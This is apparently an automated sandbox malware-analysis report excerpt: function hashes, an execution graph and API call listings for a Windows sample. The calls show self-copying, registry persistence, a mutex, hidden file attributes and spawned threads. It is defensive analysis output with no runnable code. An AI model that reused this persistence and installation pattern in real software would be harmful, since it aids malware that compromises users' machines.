                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 01ec43695ddc7286dbcceaba2880bf7fab6e6368ace47ab61488cef6412a771e
                                                                                                                                                                                              • Instruction ID: 5ef45fc539c24469acfc0cd4e9d980dda6bb4a8d6242d4d4a45a368b9f2c55c7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 01ec43695ddc7286dbcceaba2880bf7fab6e6368ace47ab61488cef6412a771e
                                                                                                                                                                                              • Instruction Fuzzy Hash: F6E1FB74E041198FCB14DFA9C5909AEFBF2FF89304F24816AE415AB35AD731A941CFA0
                                                                                                                                                                                              Function 04F12357 Relevance: .3, Instructions: 271COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: efecc67853a1878b969427e5181d98ebb5cf258fe67ca4c28fb433adf20ca4c1
                                                                                                                                                                                              • Instruction ID: ecfe9d29f3e58969dd8363d8e485aefb50aa417f94fc4f1f856fba80862b9bff
                                                                                                                                                                                              • Opcode Fuzzy Hash: efecc67853a1878b969427e5181d98ebb5cf258fe67ca4c28fb433adf20ca4c1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3ED1F531D2075A8ADB00EF64D950A99B7B1FFD5300F2087AAE5097B615FB70AAC5CF81
                                                                                                                                                                                              Function 04F12368 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: f30f14cc57e443dfa85c24a1e005b305103d0994b83234e72de9da73a90edcf6
                                                                                                                                                                                              • Instruction ID: 417a597ed4bd2b35e4eb02d5c91472024f3fc8a30dc0390ea9d279b7459918e2
                                                                                                                                                                                              • Opcode Fuzzy Hash: f30f14cc57e443dfa85c24a1e005b305103d0994b83234e72de9da73a90edcf6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 81D1E431D2075A8ADB00EF64D950A99B7B1FF95300F2087AAE5097B615FB70AAC5CF81
                                                                                                                                                                                              Function 00DFE5A4 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1831296070.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_df0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 817c5e493db13cb430847f08da548b1857b3efed8e50fbd8297877ca6f12f02a
                                                                                                                                                                                              • Instruction ID: 4486288bdcf8d41c3df40fa9d0cbacc67f7bf92564e1e2efda513a173eb01357
                                                                                                                                                                                              • Opcode Fuzzy Hash: 817c5e493db13cb430847f08da548b1857b3efed8e50fbd8297877ca6f12f02a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DA16F32E0021D8FCF05DFB5D8845AEB7B2FF84300B1A857AE905AB265DB71E955CB60

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:1.9%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                              Signature Coverage:2%
                                                                                                                                                                                              Total number of Nodes:685
                                                                                                                                                                                              Total number of Limit Nodes:21
                                                                                                                                                                                              execution_graph 46506 446f53 GetLastError 46507 446f6c 46506->46507 46508 446f72 46506->46508 46532 447476 11 API calls 2 library calls 46507->46532 46512 446fc9 SetLastError 46508->46512 46525 448716 46508->46525 46515 446fd2 46512->46515 46513 446f8c 46533 446ad5 20 API calls _free 46513->46533 46516 446fa1 46516->46513 46518 446fa8 46516->46518 46535 446d41 20 API calls __dosmaperr 46518->46535 46519 446f92 46520 446fc0 SetLastError 46519->46520 46520->46515 46522 446fb3 46536 446ad5 20 API calls _free 46522->46536 46524 446fb9 46524->46512 46524->46520 46530 448723 _strftime 46525->46530 46526 448763 46538 445364 20 API calls __dosmaperr 46526->46538 46527 44874e RtlAllocateHeap 46528 446f84 46527->46528 46527->46530 46528->46513 46534 4474cc 11 API calls 2 library calls 46528->46534 46530->46526 46530->46527 46537 442210 7 API calls 2 library calls 46530->46537 46532->46508 46533->46519 46534->46516 46535->46522 46536->46524 46537->46530 46538->46528 46539 43a9a8 46542 43a9b4 _swprintf ___DestructExceptionObject 46539->46542 46540 43a9c2 46555 445364 20 API calls __dosmaperr 46540->46555 46542->46540 46544 43a9ec 46542->46544 46543 43a9c7 __wsopen_s 46550 444adc EnterCriticalSection 46544->46550 46546 43a9f7 46551 43aa98 46546->46551 46550->46546 46553 43aaa6 46551->46553 46552 43aa02 46556 43aa1f LeaveCriticalSection std::_Lockit::~_Lockit 46552->46556 46553->46552 46557 448426 36 API calls 2 library calls 46553->46557 46555->46543 46556->46543 46557->46553 46558 4339ce 46559 4339da ___DestructExceptionObject 46558->46559 46590 4336c3 46559->46590 46561 4339e1 46562 433b34 46561->46562 46566 433a0b 46561->46566 46881 433b54 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46562->46881 46564 433b3b 46882 4426ce 28 API calls _Atexit 46564->46882 46574 433a4a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46566->46574 46875 4434e1 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 46566->46875 46567 433b41 46883 442680 28 API calls _Atexit 46567->46883 46570 433a24 46572 433a2a 46570->46572 46876 443485 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 46570->46876 46571 433b49 46575 433aab 46574->46575 46877 43ee04 35 API calls 4 library calls 46574->46877 46601 433c6e 46575->46601 46584 433acd 46584->46564 46585 433ad1 46584->46585 46586 433ada 46585->46586 46879 442671 28 API calls _Atexit 46585->46879 46880 433852 13 API calls 2 library calls 46586->46880 46589 433ae2 46589->46572 46591 4336cc 46590->46591 46884 433e1a IsProcessorFeaturePresent 46591->46884 46593 4336d8 46885 4379fe 10 API calls 3 library calls 46593->46885 46595 4336dd 46596 4336e1 46595->46596 46886 44336e 46595->46886 46596->46561 46599 4336f8 46599->46561 46895 436060 46601->46895 46603 433c81 GetStartupInfoW 46604 433ab1 46603->46604 46605 443432 46604->46605 46896 44ddd9 46605->46896 46607 44343b 46608 433aba 46607->46608 46900 44e0e3 35 API calls 46607->46900 46610 40d767 46608->46610 46902 41bcf3 LoadLibraryA GetProcAddress 46610->46902 46612 40d783 GetModuleFileNameW 46907 40e168 46612->46907 46614 40d79f 46922 401fbd 46614->46922 46617 401fbd 28 API calls 46618 40d7bd 46617->46618 46926 41afd3 46618->46926 46622 40d7cf 46951 401d8c 46622->46951 46624 40d7d8 46625 40d835 46624->46625 46626 40d7eb 46624->46626 46957 401d64 46625->46957 47150 40e986 90 API calls 46626->47150 46629 40d845 46632 401d64 22 API calls 46629->46632 46630 40d7fd 46631 401d64 22 API calls 46630->46631 46634 40d809 46631->46634 46633 40d864 46632->46633 46962 404cbf 46633->46962 47151 40e937 65 API calls 46634->47151 46636 40d873 46966 405ce6 46636->46966 46639 40d87f 46969 401eef 46639->46969 46640 40d824 47152 40e155 65 API calls 46640->47152 46643 40d88b 46973 401eea 46643->46973 46645 40d894 46647 401eea 11 API calls 46645->46647 46646 401eea 11 API calls 46648 40dc9f 46646->46648 46649 40d89d 46647->46649 46878 433ca4 GetModuleHandleW 46648->46878 46650 401d64 22 API calls 46649->46650 46651 40d8a6 46650->46651 46977 401ebd 46651->46977 46653 40d8b1 46654 401d64 22 API calls 46653->46654 46655 40d8ca 46654->46655 46656 401d64 22 API calls 46655->46656 46658 40d8e5 46656->46658 46657 40d946 46659 401d64 22 API calls 46657->46659 46674 40e134 46657->46674 46658->46657 46981 4085b4 46658->46981 46665 40d95d 46659->46665 46661 40d912 46662 401eef 11 API calls 46661->46662 46663 40d91e 46662->46663 46666 401eea 11 API calls 46663->46666 46664 40d9a4 46988 40bed7 46664->46988 46665->46664 46671 4124b7 3 API calls 46665->46671 46668 40d927 46666->46668 46985 4124b7 RegOpenKeyExA 46668->46985 46669 40d9aa 46670 40d82d 46669->46670 46991 41a473 46669->46991 46670->46646 46676 40d988 46671->46676 47184 412902 30 API calls 46674->47184 46675 40d9c5 46677 40da18 46675->46677 47008 40697b 46675->47008 46676->46664 47153 412902 30 API calls 46676->47153 46680 401d64 22 API calls 46677->46680 46682 40da21 46680->46682 46691 40da32 46682->46691 46692 40da2d 46682->46692 46684 40e14a 47185 4112b5 64 API calls ___scrt_fastfail 46684->47185 46685 40d9e4 47154 40699d 30 API calls 46685->47154 46686 40d9ee 46690 401d64 22 API calls 46686->46690 46699 40d9f7 46690->46699 46696 401d64 22 API calls 46691->46696 47157 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46692->47157 46693 40d9e9 47155 4064d0 97 API calls 46693->47155 46697 40da3b 46696->46697 47012 41ae18 46697->47012 46699->46677 46702 40da13 46699->46702 46700 40da46 47016 401e18 46700->47016 47156 4064d0 97 API calls 46702->47156 46703 40da51 47020 401e13 46703->47020 46706 40da5a 46707 401d64 22 API calls 46706->46707 46708 40da63 46707->46708 46709 401d64 22 API calls 46708->46709 46710 40da7d 46709->46710 46711 401d64 22 API calls 46710->46711 46712 40da97 46711->46712 46713 401d64 22 API calls 46712->46713 46714 40dab0 46713->46714 46716 401d64 22 API calls 46714->46716 46746 40db1d 46714->46746 46715 40db2c 46717 401d64 22 API calls 46715->46717 46722 40dbb1 46715->46722 46719 40dac5 _wcslen 46716->46719 46718 40db3e 46717->46718 46720 401d64 22 API calls 46718->46720 46723 401d64 22 API calls 46719->46723 46719->46746 46724 40db50 46720->46724 46721 40dcaa ___scrt_fastfail 47160 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46721->47160 46745 40dbac ___scrt_fastfail 46722->46745 46725 40dae0 46723->46725 46727 401d64 22 API calls 46724->46727 46729 401d64 22 API calls 46725->46729 46728 40db62 46727->46728 46732 401d64 22 API calls 46728->46732 46730 40daf5 46729->46730 47024 40c89e 46730->47024 46731 40dcef 46733 401d64 22 API calls 46731->46733 46734 40db8b 46732->46734 46735 40dd16 46733->46735 46740 401d64 22 API calls 46734->46740 47161 401f66 46735->47161 46738 401e18 11 API calls 46739 40db14 46738->46739 46742 401e13 11 API calls 46739->46742 46743 40db9c 46740->46743 46742->46746 47081 40bc67 46743->47081 46744 40dd25 47165 4126d2 14 API calls 46744->47165 46745->46722 47158 4128a2 31 API calls 46745->47158 46746->46715 46746->46721 46750 40dd3b 46752 401d64 22 API calls 46750->46752 46751 40dc45 ctype 46754 401d64 22 API calls 46751->46754 46753 40dd47 46752->46753 47166 43a5f7 39 API calls _swprintf 46753->47166 46757 40dc5c 46754->46757 46756 40dd54 46758 40dd81 46756->46758 47167 41bec0 86 API calls ___scrt_fastfail 46756->47167 46757->46731 46759 401d64 22 API calls 46757->46759 46764 401f66 28 API calls 46758->46764 46761 40dc7e 46759->46761 46762 41ae18 28 API calls 46761->46762 46766 40dc87 46762->46766 46763 40dd65 CreateThread 46763->46758 47359 41c97f 10 API calls 46763->47359 46765 40dd96 46764->46765 46767 401f66 28 API calls 46765->46767 47159 40e219 109 API calls 46766->47159 46769 40dda5 46767->46769 47168 41a696 79 API calls 46769->47168 46770 40dc8c 46770->46731 46772 40dc93 46770->46772 46772->46670 46773 40ddaa 46774 401d64 22 API calls 46773->46774 46775 40ddb6 46774->46775 46776 401d64 22 API calls 46775->46776 46777 40ddcb 46776->46777 46778 401d64 22 API calls 46777->46778 46779 40ddeb 46778->46779 47169 43a5f7 39 API calls _swprintf 46779->47169 46781 40ddf8 46782 401d64 22 API calls 46781->46782 46783 40de03 46782->46783 46784 401d64 22 API calls 46783->46784 46785 40de14 46784->46785 46786 401d64 22 API calls 46785->46786 46787 40de29 46786->46787 46788 401d64 22 API calls 46787->46788 46789 40de3a 46788->46789 46790 40de41 StrToIntA 46789->46790 47170 409517 142 API calls _wcslen 46790->47170 46792 40de53 46793 401d64 22 API calls 46792->46793 46795 40de5c 46793->46795 46794 40dea1 46797 401d64 22 API calls 46794->46797 46795->46794 47171 43361d 22 API calls 3 library calls 46795->47171 46802 40deb1 46797->46802 46798 40de71 46799 401d64 22 API calls 46798->46799 46800 40de84 46799->46800 46803 40de8b CreateThread 46800->46803 46801 40def9 46805 401d64 22 API calls 46801->46805 46802->46801 47172 43361d 22 API calls 3 library calls 46802->47172 46803->46794 47355 419138 102 API calls __EH_prolog 46803->47355 46810 40df02 46805->46810 46806 40dec6 46807 401d64 22 API calls 46806->46807 46808 40ded8 46807->46808 46813 40dedf CreateThread 46808->46813 46809 40df6c 46811 401d64 22 API calls 46809->46811 46810->46809 46812 401d64 22 API calls 46810->46812 46815 40df75 46811->46815 46814 40df1e 46812->46814 46813->46801 47360 419138 102 API calls __EH_prolog 46813->47360 46817 401d64 22 API calls 46814->46817 46816 40dfba 46815->46816 46819 401d64 22 API calls 46815->46819 47176 41a7b2 29 API calls 46816->47176 46820 40df33 46817->46820 46822 40df8a 46819->46822 47173 40c854 31 API calls 46820->47173 46821 40dfc3 46823 401e18 11 API calls 46821->46823 46827 401d64 22 API calls 46822->46827 46824 40dfce 46823->46824 46826 401e13 11 API calls 46824->46826 46829 40dfd7 CreateThread 46826->46829 46830 40df9f 46827->46830 46828 40df46 46831 401e18 11 API calls 46828->46831 46834 40e004 46829->46834 46835 40dff8 CreateThread 46829->46835 47354 40e54f 82 API calls 46829->47354 47174 43a5f7 39 API calls _swprintf 46830->47174 46833 40df52 46831->46833 46836 401e13 11 API calls 46833->46836 46838 40e019 46834->46838 46839 40e00d CreateThread 46834->46839 46835->46834 47356 410f36 138 API calls 46835->47356 46837 40df5b CreateThread 46836->46837 46837->46809 47357 40196b 49 API calls 46837->47357 46842 40e073 46838->46842 46844 401f66 28 API calls 46838->46844 46839->46838 47358 411524 38 API calls ___scrt_fastfail 46839->47358 46841 40dfac 47175 40b95c 7 API calls 46841->47175 47179 41246e RegOpenKeyExA RegQueryValueExA RegCloseKey 46842->47179 46845 40e046 46844->46845 47177 404c9e 28 API calls 46845->47177 46848 40e08b 46850 40e12a 46848->46850 46852 41ae18 28 API calls 46848->46852 46849 40e053 46851 401f66 28 API calls 46849->46851 47182 40cbac 27 API calls 46850->47182 46853 40e062 46851->46853 46855 40e0a4 46852->46855 47178 41a696 79 API calls 46853->47178 47180 412584 31 API calls 46855->47180 46857 40e12f 47183 413fd4 168 API calls 46857->47183 46858 40e067 46860 401eea 11 API calls 46858->46860 46860->46842 46862 40e0ba 46863 401e13 11 API calls 46862->46863 46866 40e0c5 46863->46866 46864 40e0ed DeleteFileW 46865 40e0f4 46864->46865 46864->46866 46867 41ae18 28 API calls 46865->46867 46866->46864 46866->46865 46868 40e0db Sleep 46866->46868 46869 40e104 46867->46869 46868->46866 47181 41297a RegOpenKeyExW RegDeleteValueW 46869->47181 46871 40e117 46872 401e13 11 API calls 46871->46872 46873 40e121 46872->46873 46874 401e13 11 API calls 46873->46874 46874->46850 46875->46570 46876->46574 46877->46575 46878->46584 46879->46586 46880->46589 46881->46564 46882->46567 46883->46571 46884->46593 46885->46595 46890 44e959 46886->46890 46889 437a27 8 API calls 3 library calls 46889->46596 46893 44e972 46890->46893 46892 4336ea 46892->46599 46892->46889 46894 433d3c 5 API calls ___raise_securityfailure 46893->46894 46894->46892 46895->46603 46897 44ddeb 46896->46897 46898 44dde2 46896->46898 46897->46607 46901 44dcd8 48 API calls 4 library calls 46898->46901 46900->46607 46901->46897 46903 41bd32 LoadLibraryA GetProcAddress 46902->46903 46904 41bd22 GetModuleHandleA GetProcAddress 46902->46904 46905 41bd5b 32 API calls 46903->46905 46906 41bd4b LoadLibraryA GetProcAddress 46903->46906 46904->46903 46905->46612 46906->46905 47186 41a64f FindResourceA 46907->47186 46911 40e192 ctype 47198 401f86 46911->47198 46914 401eef 11 API calls 46915 40e1b8 46914->46915 46916 401eea 11 API calls 46915->46916 46917 40e1c1 46916->46917 46918 43a89c ___std_exception_copy 21 API calls 46917->46918 46919 40e1d2 ctype 46918->46919 47202 406052 46919->47202 46921 40e205 46921->46614 46923 401fcc 46922->46923 47212 402501 46923->47212 46925 401fea 46925->46617 46946 41afe6 46926->46946 46927 41b056 46928 401eea 11 API calls 46927->46928 46929 41b088 46928->46929 46931 401eea 11 API calls 46929->46931 46930 41b058 47219 403b60 28 API calls 46930->47219 46933 41b090 46931->46933 46936 401eea 11 API calls 46933->46936 46935 41b064 46937 401eef 11 API calls 46935->46937 46939 40d7c6 46936->46939 46940 41b06d 46937->46940 46938 401eef 11 API calls 46938->46946 46947 40e8bd 46939->46947 46941 401eea 11 API calls 46940->46941 46943 41b075 46941->46943 46942 401eea 11 API calls 46942->46946 47220 41bfb9 28 API calls 46943->47220 46946->46927 46946->46930 46946->46938 46946->46942 47217 403b60 28 API calls 46946->47217 47218 41bfb9 28 API calls 46946->47218 46948 40e8ca 46947->46948 46950 40e8da 46948->46950 47221 40200a 11 API calls 46948->47221 46950->46622 46952 40200a 46951->46952 46956 40203a 46952->46956 47222 402654 11 API calls 46952->47222 46954 40202b 47223 4026ba 11 API calls _Deallocate 46954->47223 46956->46624 46958 401d6c 46957->46958 46959 401d74 46958->46959 47224 401fff 22 API calls 46958->47224 46959->46629 46963 404ccb 46962->46963 47225 402e78 46963->47225 46965 404cee 46965->46636 47234 404bc4 46966->47234 46968 405cf4 46968->46639 46970 401efe 46969->46970 46972 401f0a 46970->46972 47243 4021b9 11 API calls 46970->47243 46972->46643 46974 4021b9 46973->46974 46975 4021e8 46974->46975 47244 40262e 11 API calls _Deallocate 46974->47244 46975->46645 46978 401ec9 46977->46978 46979 401ee4 46978->46979 46980 402325 28 API calls 46978->46980 46979->46653 46980->46979 46982 4085c0 46981->46982 46983 402e78 28 API calls 46982->46983 46984 4085e4 46983->46984 46984->46661 46986 4124e1 RegQueryValueExA RegCloseKey 46985->46986 46987 41250b 46985->46987 46986->46987 46987->46657 47245 401e8f 46988->47245 46990 40bee1 CreateMutexA GetLastError 46990->46669 47247 41b16b 46991->47247 46996 401eef 11 API calls 46997 41a4af 46996->46997 46998 401eea 11 API calls 46997->46998 46999 41a4b7 46998->46999 47000 41a50a 46999->47000 47001 412513 31 API calls 46999->47001 47000->46675 47002 41a4dd 47001->47002 47003 41a4e8 StrToIntA 47002->47003 47004 41a4ff 47003->47004 47005 41a4f6 47003->47005 47007 401eea 11 API calls 47004->47007 47255 41c112 22 API calls 47005->47255 47007->47000 47009 40698f 47008->47009 47010 4124b7 3 API calls 47009->47010 47011 406996 47010->47011 47011->46685 47011->46686 47013 41ae2c 47012->47013 47256 40b027 47013->47256 47015 41ae34 47015->46700 47017 401e27 47016->47017 47019 401e33 47017->47019 47265 402121 11 API calls 47017->47265 47019->46703 47021 402121 47020->47021 47022 402150 47021->47022 47266 402718 11 API calls _Deallocate 47021->47266 47022->46706 47025 40c8ba 47024->47025 47026 40c8da 47025->47026 47027 40c90f 47025->47027 47039 40c8d0 47025->47039 47271 41a75b 29 API calls 47026->47271 47030 41b16b GetCurrentProcess 47027->47030 47029 40ca03 GetLongPathNameW 47267 403b40 47029->47267 47033 40c914 47030->47033 47031 40c8e3 47034 401e18 11 API calls 47031->47034 47036 40c918 47033->47036 47037 40c96a 47033->47037 47038 40c8ed 47034->47038 47042 403b40 28 API calls 47036->47042 47041 403b40 28 API calls 47037->47041 47046 401e13 11 API calls 47038->47046 47039->47029 47040 403b40 28 API calls 47043 40ca27 47040->47043 47044 40c978 47041->47044 47045 40c926 47042->47045 47274 40cc37 28 API calls 47043->47274 47049 403b40 28 API calls 47044->47049 47050 403b40 28 API calls 47045->47050 47046->47039 47048 40ca3a 47275 402860 28 API calls 47048->47275 47053 40c98e 47049->47053 47054 40c93c 47050->47054 47052 40ca45 47276 402860 28 API calls 47052->47276 47273 402860 28 API calls 47053->47273 47272 402860 28 API calls 47054->47272 47058 40ca4f 47061 401e13 11 API calls 47058->47061 47059 40c999 47062 401e18 11 API calls 47059->47062 47060 40c947 47063 401e18 11 API calls 47060->47063 47064 40ca59 47061->47064 47065 40c9a4 47062->47065 47066 40c952 47063->47066 47067 401e13 11 API calls 47064->47067 47068 401e13 11 API calls 47065->47068 47069 401e13 11 API calls 47066->47069 47070 40ca62 47067->47070 47071 40c9ad 47068->47071 47072 40c95b 47069->47072 47073 401e13 11 API calls 47070->47073 47074 401e13 11 API calls 47071->47074 47075 401e13 11 API calls 47072->47075 47076 40ca6b 47073->47076 47074->47038 47075->47038 47077 401e13 11 API calls 47076->47077 47078 40ca74 47077->47078 47079 401e13 11 API calls 47078->47079 47080 40ca7d 47079->47080 47080->46738 47082 40bc7a _wcslen 47081->47082 47083 40bc84 47082->47083 47084 40bcce 47082->47084 47087 40bc8d CreateDirectoryW 47083->47087 47085 40c89e 31 API calls 47084->47085 47086 40bce0 47085->47086 47088 401e18 11 API calls 47086->47088 47278 40856b 47087->47278 47090 40bccc 47088->47090 47092 401e13 11 API calls 47090->47092 47091 40bca9 47312 4028cf 47091->47312 47097 40bcf7 47092->47097 47094 40bcb5 47095 401e18 11 API calls 47094->47095 47096 40bcc3 47095->47096 47098 401e13 11 API calls 47096->47098 47099 40bd10 47097->47099 47100 40bd2d 47097->47100 47098->47090 47103 40bb7b 31 API calls 47099->47103 47101 40bd36 CopyFileW 47100->47101 47102 40be07 47101->47102 47105 40bd48 _wcslen 47101->47105 47284 40bb7b 47102->47284 47104 40bd21 47103->47104 47104->46745 47105->47102 47107 40bd64 47105->47107 47108 40bdb7 47105->47108 47110 40c89e 31 API calls 47107->47110 47109 40c89e 31 API calls 47108->47109 47113 40bdbd 47109->47113 47114 40bd6a 47110->47114 47111 40be4d 47112 40be95 CloseHandle 47111->47112 47117 403b40 28 API calls 47111->47117 47310 401e07 47112->47310 47118 401e18 11 API calls 47113->47118 47119 401e18 11 API calls 47114->47119 47115 40be18 47115->47111 47120 40be2a SetFileAttributesW 47115->47120 47122 40be63 47117->47122 47123 40bdb1 47118->47123 47124 40bd76 47119->47124 47134 40be39 _wcslen 47120->47134 47121 40beb1 ShellExecuteW 47125 40bec4 47121->47125 47126 40bece ExitProcess 47121->47126 47127 41ae18 28 API calls 47122->47127 47131 401e13 11 API calls 47123->47131 47128 401e13 11 API calls 47124->47128 47129 40bed7 CreateMutexA GetLastError 47125->47129 47130 40be76 47127->47130 47132 40bd7f 47128->47132 47129->47104 47315 412774 RegCreateKeyW 47130->47315 47135 40bdcf 47131->47135 47133 40856b 28 API calls 47132->47133 47136 40bd93 47133->47136 47134->47111 47137 40be4a SetFileAttributesW 47134->47137 47138 40bddb CreateDirectoryW 47135->47138 47139 4028cf 28 API calls 47136->47139 47137->47111 47141 401e07 47138->47141 47142 40bd9f 47139->47142 47144 40bdeb CopyFileW 47141->47144 47145 401e18 11 API calls 47142->47145 47144->47102 47147 40bdf8 47144->47147 47148 40bda8 47145->47148 47146 401e13 11 API calls 47146->47112 47147->47104 47149 401e13 11 API calls 47148->47149 47149->47123 47150->46630 47151->46640 47153->46664 47154->46693 47155->46686 47156->46677 47157->46691 47158->46751 47159->46770 47160->46731 47162 401f6e 47161->47162 47349 402301 47162->47349 47165->46750 47166->46756 47167->46763 47168->46773 47169->46781 47170->46792 47171->46798 47172->46806 47173->46828 47174->46841 47175->46816 47176->46821 47177->46849 47178->46858 47179->46848 47180->46862 47181->46871 47182->46857 47353 419e99 104 API calls 47183->47353 47184->46684 47187 40e183 47186->47187 47188 41a66c LoadResource LockResource SizeofResource 47186->47188 47189 43a89c 47187->47189 47188->47187 47190 446b0f 47189->47190 47191 446b4d 47190->47191 47192 446b38 HeapAlloc 47190->47192 47197 446b21 _strftime 47190->47197 47206 445364 20 API calls __dosmaperr 47191->47206 47194 446b4b 47192->47194 47192->47197 47195 446b52 47194->47195 47195->46911 47197->47191 47197->47192 47205 442210 7 API calls 2 library calls 47197->47205 47199 401f8e 47198->47199 47207 402325 47199->47207 47201 401fa4 47201->46914 47203 401f86 28 API calls 47202->47203 47204 406066 47203->47204 47204->46921 47205->47197 47206->47195 47208 40232f 47207->47208 47210 40233a 47208->47210 47211 40294a 28 API calls 47208->47211 47210->47201 47211->47210 47213 40250d 47212->47213 47215 40252b 47213->47215 47216 40261a 28 API calls 47213->47216 47215->46925 47216->47215 47217->46946 47218->46946 47219->46935 47220->46927 47221->46950 47222->46954 47223->46956 47226 402e85 47225->47226 47227 402ea9 47226->47227 47228 402e98 47226->47228 47230 402eae 47226->47230 47227->46965 47232 403445 28 API calls 47228->47232 47230->47227 47233 40225b 11 API calls 47230->47233 47232->47227 47233->47227 47235 404bd0 47234->47235 47238 40245c 47235->47238 47237 404be4 47237->46968 47239 402469 47238->47239 47241 402478 47239->47241 47242 402ad3 28 API calls 47239->47242 47241->47237 47242->47241 47243->46972 47244->46975 47246 401e94 47245->47246 47248 41a481 47247->47248 47249 41b178 GetCurrentProcess 47247->47249 47250 412513 RegOpenKeyExA 47248->47250 47249->47248 47251 412541 RegQueryValueExA RegCloseKey 47250->47251 47252 412569 47250->47252 47251->47252 47253 401f66 28 API calls 47252->47253 47254 41257e 47253->47254 47254->46996 47255->47004 47257 40b02f 47256->47257 47260 40b04b 47257->47260 47259 40b045 47259->47015 47261 40b055 47260->47261 47263 40b060 47261->47263 47264 40b138 28 API calls 47261->47264 47263->47259 47264->47263 47265->47019 47266->47022 47268 403b48 47267->47268 47277 403b7a 28 API calls 47268->47277 47270 403b5a 47270->47040 47271->47031 47272->47060 47273->47059 47274->47048 47275->47052 47276->47058 47277->47270 47279 408577 47278->47279 47321 402ca8 47279->47321 47283 4085a3 47283->47091 47285 40bba1 47284->47285 47286 40bbdd 47284->47286 47339 40b0dd 47285->47339 47287 40bc1e 47286->47287 47289 40b0dd 28 API calls 47286->47289 47290 40bc5f 47287->47290 47293 40b0dd 28 API calls 47287->47293 47292 40bbf4 47289->47292 47290->47115 47295 4028cf 28 API calls 47292->47295 47296 40bc35 47293->47296 47294 4028cf 28 API calls 47297 40bbbd 47294->47297 47298 40bbfe 47295->47298 47299 4028cf 28 API calls 47296->47299 47300 412774 14 API calls 47297->47300 47301 412774 14 API calls 47298->47301 47302 40bc3f 47299->47302 47303 40bbd1 47300->47303 47306 40bc12 47301->47306 47304 412774 14 API calls 47302->47304 47305 401e13 11 API calls 47303->47305 47307 40bc53 47304->47307 47305->47286 47308 401e13 11 API calls 47306->47308 47309 401e13 11 API calls 47307->47309 47308->47287 47309->47290 47311 401e0c 47310->47311 47345 402d8b 47312->47345 47314 4028dd 47314->47094 47316 4127c6 47315->47316 47319 412789 47315->47319 47317 401e13 11 API calls 47316->47317 47318 40be89 47317->47318 47318->47146 47320 4127a2 RegSetValueExW RegCloseKey 47319->47320 47320->47316 47322 402cb5 47321->47322 47323 402cc8 47322->47323 47325 402cd9 47322->47325 47326 402cde 47322->47326 47332 403374 28 API calls 47323->47332 47328 402de3 47325->47328 47326->47325 47333 402f21 11 API calls 47326->47333 47329 402daf 47328->47329 47334 4030f7 47329->47334 47331 402dcd 47331->47283 47332->47325 47333->47325 47335 403101 47334->47335 47337 403115 47335->47337 47338 4036c2 28 API calls 47335->47338 47337->47331 47338->47337 47340 40b0e9 47339->47340 47341 402ca8 28 API calls 47340->47341 47342 40b10c 47341->47342 47343 402de3 28 API calls 47342->47343 47344 40b11f 47343->47344 47344->47294 47346 402d97 47345->47346 47347 4030f7 28 API calls 47346->47347 47348 402dab 47347->47348 47348->47314 47350 40230d 47349->47350 47351 402325 28 API calls 47350->47351 47352 401f80 47351->47352 47352->46744 47361 411637 62 API calls 47356->47361

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Function 0041BCF3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
